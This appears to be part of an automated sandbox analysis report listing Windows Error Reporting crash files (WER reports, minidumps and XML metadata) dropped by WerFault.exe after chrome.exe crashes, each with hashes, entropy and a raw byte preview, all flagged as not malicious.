                                                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.9.1.3.3.0.7.3.7.5.8.9.9.0.6.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.1.3.1.0.7.2.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.b.b.f.a.c.3.3.-.b.7.4.e.-.4.b.7.5.-.8.9.6.4.-.5.2.e.4.9.3.7.c.c.6.6.a.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.9.8.f.1.d.4.9.-.b.3.8.6.-.4.1.0.c.-.a.1.a.b.-.2.e.2.e.3.9.1.1.c.f.2.9.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.c.h.r.o.m.e...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.c.h.r.o.m.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.c.5.c.-.0.0.0.1.-.0.0.1.8.-.7.d.9.1.-.f.0.8.b.7.1.c.1.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.b.e.e.b.f.9.6.7.c.b.7.5.7.3.a.a.9.7.d.c.2.a.8.8.f.1.7.f.f.3.c.5.0.0.0.0.f.f.f.f.!.0.0.0.0.a.1.f.0.7.b.b.4.5.0.1.9.c.a.d.2.a.d.b.0.0.6.7.0.1.6.5.f.7.1.0.d.a.9.4.9.2.5.1.2.!.c.h.r.o.m.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.5././.0.2././.2.5.:.2.0.:.0.6.:.0.8.!.
                                                Process:C:\Windows\System32\WerFault.exe
                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):0.7016473219571256
                                                Encrypted:false
                                                SSDEEP:96:78rFA6i7srEoZGNfCQXIDcQic6ycEJcw3++HbHu2A2Z+ZwfZAX/d5FMT2SlPkpXA:oBAJ7b0c2TTj2zuiFWZ24lO89
                                                MD5:3F0FAC9082B40827747A5C64ACF90377
                                                SHA1:88D7C54789BA2C6EADDD18019432645B3CBBD03B
                                                SHA-256:70386481C399652EDBF42B62C5462C123BBB5A99D316606A5080095C2DF5902D
                                                SHA-512:AEA098B81D4BED421C3782B51312919FA429CCD9409E4FF1D6BE29D8A3C02D86EB3C5AE094EA41BCE82E8F35351E468F63726999261F3A325F5B3D31B57C2F44
                                                Malicious:false
                                                Reputation:low
                                                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.9.1.3.3.0.7.4.6.9.3.8.1.1.8.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.1.3.1.0.7.2.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.e.4.f.2.3.f.e.-.4.4.5.3.-.4.c.0.8.-.8.e.4.9.-.5.e.c.9.a.4.d.9.9.4.3.1.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.2.0.d.c.8.e.f.-.c.e.7.d.-.4.9.6.b.-.a.c.d.e.-.f.e.a.0.a.e.2.a.b.a.b.7.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.c.h.r.o.m.e...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.c.h.r.o.m.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.6.9.c.-.0.0.0.1.-.0.0.1.8.-.9.8.b.7.-.e.d.9.1.7.1.c.1.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.b.e.e.b.f.9.6.7.c.b.7.5.7.3.a.a.9.7.d.c.2.a.8.8.f.1.7.f.f.3.c.5.0.0.0.0.f.f.f.f.!.0.0.0.0.a.1.f.0.7.b.b.4.5.0.1.9.c.a.d.2.a.d.b.0.0.6.7.0.1.6.5.f.7.1.0.d.a.9.4.9.2.5.1.2.!.c.h.r.o.m.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.5././.0.2././.2.5.:.2.0.:.0.6.:.0.8.!.
                                                Process:C:\Windows\System32\WerFault.exe
                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):0.701969616652614
                                                Encrypted:false
                                                SSDEEP:96:f8Mrj6iRsrEoZGNfCQXIDcQic6ycEJcw3++HbHu2A2Z+ZwfZAX/d5FMT2SlPkpXj:UmjJRb0c2TTj2zuiFWZ24lO89
                                                MD5:3A564AA259653C2ED635E50282191FEE
                                                SHA1:F4BA8D23E4B6CE0E0AB1439069D24F347DFC6F61
                                                SHA-256:AD17C21417D673493B195FE1CB7CC13541D862F332D6AB9FB234137B5515ADDA
                                                SHA-512:97003F0D01BDEF7E6321315433C9DA1DE6D7C29260FF09150CE1D3782944A9F044017CDC6D0CEAB96FA0ED97D02E6B34FD74FFBDD1AA74F7D9D3361FD16FEFC9
                                                Malicious:false
                                                Reputation:low
                                                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.9.1.3.3.0.7.4.1.9.5.6.4.7.9.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.1.3.1.0.7.2.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.a.2.a.0.2.b.0.-.9.0.a.6.-.4.a.2.8.-.9.c.9.0.-.2.e.5.b.e.f.4.7.4.6.e.a.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.8.2.b.9.b.5.f.-.4.b.a.3.-.4.3.e.5.-.8.a.d.6.-.e.8.8.8.8.f.7.4.c.a.f.7.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.c.h.r.o.m.e...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.c.h.r.o.m.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.f.3.0.-.0.0.0.1.-.0.0.1.8.-.d.2.d.8.-.f.4.8.e.7.1.c.1.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.b.e.e.b.f.9.6.7.c.b.7.5.7.3.a.a.9.7.d.c.2.a.8.8.f.1.7.f.f.3.c.5.0.0.0.0.f.f.f.f.!.0.0.0.0.a.1.f.0.7.b.b.4.5.0.1.9.c.a.d.2.a.d.b.0.0.6.7.0.1.6.5.f.7.1.0.d.a.9.4.9.2.5.1.2.!.c.h.r.o.m.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.5././.0.2././.2.5.:.2.0.:.0.6.:.0.8.!.
                                                Process:C:\Windows\System32\WerFault.exe
                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):0.702738370066236
                                                Encrypted:false
                                                SSDEEP:96:f84Fu6iJsrEodGNfBQXIDcQoc6OcEZcw3CAKGp+HbHu2A2Z+ZwfZAX/d5FMT2Sl0:U4FuJJU0mKD6Jj2zuiFWZ24lO89
                                                MD5:8EEE8B40E3098160719F59E152369BB1
                                                SHA1:CA27212542B7ADDA1F316D77440CBDF045E328D3
                                                SHA-256:6824E42492634BC2218DF605F40A185164575B92F6F73704146F2ECFBF33262F
                                                SHA-512:0CBFB7A4B8739094CBD82C46E73B70F5B43AB514EE161CD336521945566B3927D53C0A99C44C82C793BC824853426219BD2F3C295818B7056BC9222F1155052A
                                                Malicious:false
                                                Reputation:low
                                                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.9.1.3.3.0.7.3.6.5.8.3.9.6.6.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.1.3.1.0.7.2.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.4.0.9.b.9.b.5.-.c.3.1.8.-.4.f.b.1.-.b.9.3.f.-.7.9.a.d.3.7.f.b.d.5.3.6.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.a.6.d.9.7.6.f.-.8.e.6.4.-.4.3.9.4.-.8.f.8.2.-.4.6.b.7.1.8.0.6.e.f.2.b.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.c.h.r.o.m.e...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.c.h.r.o.m.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.c.5.c.-.0.0.0.1.-.0.0.1.8.-.7.d.9.1.-.f.0.8.b.7.1.c.1.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.b.e.e.b.f.9.6.7.c.b.7.5.7.3.a.a.9.7.d.c.2.a.8.8.f.1.7.f.f.3.c.5.0.0.0.0.f.f.f.f.!.0.0.0.0.a.1.f.0.7.b.b.4.5.0.1.9.c.a.d.2.a.d.b.0.0.6.7.0.1.6.5.f.7.1.0.d.a.9.4.9.2.5.1.2.!.c.h.r.o.m.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.5././.0.2././.2.5.:.2.0.:.0.6.:.0.8.!.
                                                Process:C:\Windows\System32\WerFault.exe
                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):0.7024438330113476
                                                Encrypted:false
                                                SSDEEP:96:FX85rvj6iRsrEodGNfBQXIDcQoc6OcEZcw3CAKGp+HbHu2A2Z+ZwfZAX/d5FMT25:FM5rvjJRU0mKD6Jj2zuiFWZ24lO89
                                                MD5:9D95A3652A5D55BD28E4F7BBDAAC94E9
                                                SHA1:CE8252E05BFFDD32B2C14FEA3CC9DCB6D96CE1B4
                                                SHA-256:8C59E76AB20B34CF9BB1EB1753B316EC773384AEED942CB19C6192B80B7F0803
                                                SHA-512:8EE47E993F070EA6708D64324269ED5EA71419D92E56E4C8F7DEB01F9294197FAC7AF74102B14CD5D2757A65216AB8EFB502766F167E891641B7653BCD96A966
                                                Malicious:false
                                                Reputation:low
                                                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.9.1.3.3.0.7.4.1.3.5.6.3.2.4.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.1.3.1.0.7.2.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.e.7.d.8.9.5.7.-.4.f.2.5.-.4.f.8.6.-.9.2.c.a.-.b.4.4.7.8.f.3.a.a.5.0.1.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.f.2.f.2.e.b.f.-.6.4.3.6.-.4.5.4.2.-.a.1.f.d.-.5.1.7.0.8.6.d.7.1.e.a.1.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.c.h.r.o.m.e...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.c.h.r.o.m.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.f.3.0.-.0.0.0.1.-.0.0.1.8.-.d.2.d.8.-.f.4.8.e.7.1.c.1.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.b.e.e.b.f.9.6.7.c.b.7.5.7.3.a.a.9.7.d.c.2.a.8.8.f.1.7.f.f.3.c.5.0.0.0.0.f.f.f.f.!.0.0.0.0.a.1.f.0.7.b.b.4.5.0.1.9.c.a.d.2.a.d.b.0.0.6.7.0.1.6.5.f.7.1.0.d.a.9.4.9.2.5.1.2.!.c.h.r.o.m.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.5././.0.2././.2.5.:.2.0.:.0.6.:.0.8.!.
                                                Process:C:\Windows\System32\WerFault.exe
                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):0.70234594334885
                                                Encrypted:false
                                                SSDEEP:96:887A6i7srEodGNfBQXIDcQoc6OcEZcw3CAKGp+HbHu2A2Z+ZwfZAX/d5FMT2SlP8:t7AJ7U0mKD6Jj2zuiFWZ24lO89
                                                MD5:EC2657D586907763DCCE38C9A7F0F9F7
                                                SHA1:1651BC41BE3470D568198297176D572D6CA5900E
                                                SHA-256:F9988585DF19514969C94DEFF76FAB11EFA8674343E432B7743C05CAF474E895
                                                SHA-512:9B6711126F00E9793617A5E04C113437FD4A2E33FA9E6C1AFCC8A66A9A6C600C985F8DACDF43FAA6DAB007E76B948A30C5AC2688D4CA97DFAEE2EC4214D9EFD5
                                                Malicious:false
                                                Reputation:low
                                                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.9.1.3.3.0.7.4.6.3.3.2.2.2.0.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.1.3.1.0.7.2.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.0.9.0.3.a.4.5.-.b.e.d.b.-.4.f.c.8.-.8.d.0.2.-.4.a.5.e.1.5.9.b.6.a.4.a.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.6.9.f.0.c.5.7.-.7.7.a.e.-.4.3.d.0.-.b.8.5.0.-.8.5.f.1.b.1.4.2.a.8.9.7.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.c.h.r.o.m.e...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.c.h.r.o.m.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.6.9.c.-.0.0.0.1.-.0.0.1.8.-.9.8.b.7.-.e.d.9.1.7.1.c.1.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.b.e.e.b.f.9.6.7.c.b.7.5.7.3.a.a.9.7.d.c.2.a.8.8.f.1.7.f.f.3.c.5.0.0.0.0.f.f.f.f.!.0.0.0.0.a.1.f.0.7.b.b.4.5.0.1.9.c.a.d.2.a.d.b.0.0.6.7.0.1.6.5.f.7.1.0.d.a.9.4.9.2.5.1.2.!.c.h.r.o.m.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.5././.0.2././.2.5.:.2.0.:.0.6.:.0.8.!.
                                                Process:C:\Windows\System32\WerFault.exe
                                                File Type:Mini DuMP crash report, 14 streams, Sat May 10 06:05:36 2025, 0x1205a4 type
                                                Category:dropped
                                                Size (bytes):28534
                                                Entropy (8bit):2.0182336636659515
                                                Encrypted:false
                                                SSDEEP:96:518Y7DBTbLbEIH9zmN3jabGldi7OOK06Ut8k4kPwNVcR5gy8vWIEvIPzrV:oKxbl03dOOOK95k8NVk8ZzrV
                                                MD5:90FC22390C2A4CE24C7F21B02EBDDD4A
                                                SHA1:E6A8E63D6A54144207169FF4C48EA533ED5E1928
                                                SHA-256:A36EF01CBCAF7E026D75BFE1A754FE0CBDD00FD5062CBBC4000C94977E6F1B0F
                                                SHA-512:A605ED2196ABA5372181D62B6930BDD7096E0575BB5A6DBFB843A5396EB0F16B921C653D956EF5105A75EBBAC6E46DB1C5C73CA3FEDCD6D63D84B7629409F8A5
                                                Malicious:false
                                                Reputation:low
                                                Preview:MDMP..a..... ..........h............4...............<...........l...........T.......8...........T................h......................................................................................................eJ......@.......Lw......................T.......\......h.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Windows\System32\WerFault.exe
                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):8520
                                                Entropy (8bit):3.7002240138065057
                                                Encrypted:false
                                                SSDEEP:192:R6l7wVeJkwNi06YsN648ngmfcBTpBi89bFI/fk3m:R6lXJTr6Y+6zgmfcB3FYfJ
                                                MD5:DEFD4366617B82D676ECE38C40BD4BE9
                                                SHA1:809F7D8996EA7EA2D7E341B5D70204E1CA43D613
                                                SHA-256:D47A6637342ECEB146C42DD521DDF0CF7756B31E400B530F66C8ED3764D04511
                                                SHA-512:8503EF5C6328FA190A76749CBA03F0823DD94BFF2DB28D81917AA7D46855E579BB448611FCCEA071516978BC0A92B91B9EAB9308118136061C3AFB6296EBD539
                                                Malicious:false
                                                Reputation:low
                                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.2.6.0.<./.P.i.
                                                Process:C:\Windows\System32\WerFault.exe
                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):4707
                                                Entropy (8bit):4.453072926698809
                                                Encrypted:false
                                                SSDEEP:48:cvIwWl8zs8Jg771I9VKWpW8VYxYm8M4JGBRhFVyq85KcYnnUCaOUadd:uIjf6I76r7VNJGBbXpnUoUadd
                                                MD5:F6402ACFDF792F7F07D919DCC683AB24
                                                SHA1:A9343A85BADC3F70E19009323B31622C0B8A9435
                                                SHA-256:D391557AE89B242404C7C57CA59E86C2CDA04719BC3EA2864789E9C6CD45EC9E
                                                SHA-512:F4CAEBA64B9E45662CEDA6FE45578FADA382D6AC062C7D4712EEC19BEE1B525085391710321EAEAC2BD2F0E0C67CD939FBF747EC01DDB6CF40D30A84E3D200A5
                                                Malicious:false
                                                Reputation:low
                                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="842228" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                Process:C:\Windows\System32\WerFault.exe
                                                File Type:Mini DuMP crash report, 14 streams, Sat May 10 06:05:37 2025, 0x1205a4 type
                                                Category:dropped
                                                Size (bytes):28374
                                                Entropy (8bit):2.0894058089075243
                                                Encrypted:false
                                                SSDEEP:96:5A847rTbLbEIH9zmNl+7X/i7OcCIpK9LoMxnNVGTBkph1+x6LtwWI0r5InHV:9qHblZjOOcCI7MhNV3x+x6Lt4HV
                                                MD5:74EF5CA7727528D5C676EF73E1088F9B
                                                SHA1:2D735E44269BB997CA383C7FFF9291FDFBDC3224
                                                SHA-256:312F46F5F133DD06157F983293800C5BB28120B7B3AA067061C4D2C7E63B546D
                                                SHA-512:185F9F7547D15173E9B775E5FB05276A987FB71B1AAFCCAA281D3B6363D2A98A377EC7093161602C9342695FAFB84017C5CF338C5CC4060EF7B9FF07A5208277
                                                Malicious:false
                                                Reputation:low
                                                Preview:MDMP..a..... ..........h............4...............<...........l...........T.......8...........T................h......................................................................................................eJ......@.......Lw......................T.......\......h.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Windows\System32\WerFault.exe
                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):8516
                                                Entropy (8bit):3.6997718290103663
                                                Encrypted:false
                                                SSDEEP:192:R6l7wVeJkjNGJ6YsZ648ngmfRKpBk89b8I2fY0m:R6lXJ4C6Y66zgmfRc8JfK
                                                MD5:15FDBF5D60B42A8F2A9CA8E7FCB7397B
                                                SHA1:65DAE6DB3D3DE770AE54756B80F4A75FFA18F193
                                                SHA-256:3E9A8277254ECF76F401588661EBE6AA36049FC5181AEE810FA7735276E0EA6A
                                                SHA-512:57EE2358514660369006DE4F6809E2279A1F0E0710239AF398612FE24B7365E648FDD4FF43EF816156E51C18C10F57383D937BE2AB66F6BDE674268AA10DDB95
                                                Malicious:false
                                                Reputation:low
                                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.2.6.0.<./.P.i.
                                                Process:C:\Windows\System32\WerFault.exe
                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):4699
                                                Entropy (8bit):4.450375048033618
                                                Encrypted:false
                                                SSDEEP:48:cvIwWl8zs8Jg771I9VKWpW8VYzYm8M4JGBRBeFqCHyq85KlETnnUCaOUadd:uIjf6I76r7VfJGBn+HXlGnUoUadd
                                                MD5:22260CC5D8E6ACFF2101DF774A338EFF
                                                SHA1:3A42AC6ED93B8CEF905FF84C330382FDDCAFC5EF
                                                SHA-256:2B71141018A62A07B75EF534F28750ECEB8F28F1B09915B48F6F9FE8DD1D06F5
                                                SHA-512:EB33B708719320ECEC7313598CE0C29A387AA79B9D6197AFE5751851ACD507756F22E700BB969E3AB194A537D87FF9E593A85A35E893CF4B3DD9526941E5C887
                                                Malicious:false
                                                Reputation:low
                                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="842228" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                Process:C:\Windows\System32\WerFault.exe
                                                File Type:Mini DuMP crash report, 14 streams, Sat May 10 06:05:41 2025, 0x1205a4 type
                                                Category:dropped
                                                Size (bytes):27766
                                                Entropy (8bit):2.0581913841934574
                                                Encrypted:false
                                                SSDEEP:96:588t9QXTbLbEIH9zmNlKXi7OY0LUzk4ltSfz9fE2V1DW3oWIBbIPk:5Oblg2OOYwMkkEzJa7k
                                                MD5:96DDD48CACDF0ACB95AA707335E30BB0
                                                SHA1:33B22EDD8E192CFDEB8706A4694A97E8D7DBC90E
                                                SHA-256:6566D6FE016BFA372B4CFC90CAE8DF6843E9BC09257F7C3648AC292DE5839784
                                                SHA-512:A50BD09F2AF2839EA1A4731FBBD7C784F9143D779DD8A5178F82344E8416CB119B5C8E979BCDB81F12E6514E65E6B007AE9D4085BDE4C3AC6BF6744912DC602C
                                                Malicious:false
                                                Reputation:low
                                                Preview:MDMP..a..... ..........h............4...............<...........l...........T.......8...........T................e......................................................................................................eJ......@.......Lw......................T.......0......h.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Windows\System32\WerFault.exe
                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):8518
                                                Entropy (8bit):3.699039399393126
                                                Encrypted:false
                                                SSDEEP:192:R6l7wVeJs3NQ6Ysxz61+gmfcBTpBc89bNYhf4Xvm:R6lXJMK6YW6kgmfcBVN2f9
                                                MD5:DAEB5E52E45490EA89360876445C0861
                                                SHA1:78913104B25A5EDC364D2B5E9C25800853785536
                                                SHA-256:7D157CAAE9BFB1F542BA8A5CD6AC04FDFD865F4C7BCAE926E0D4691D00C05A72
                                                SHA-512:03F9F0631BCC5BAA92539319149B2B4E77F149D4591E255A75A2DACE7BE04AD15DAB32A1547AE5D45A7656DCF687A4610CCB8A06D1E3BA7C011ED80EED275524
                                                Malicious:false
                                                Reputation:low
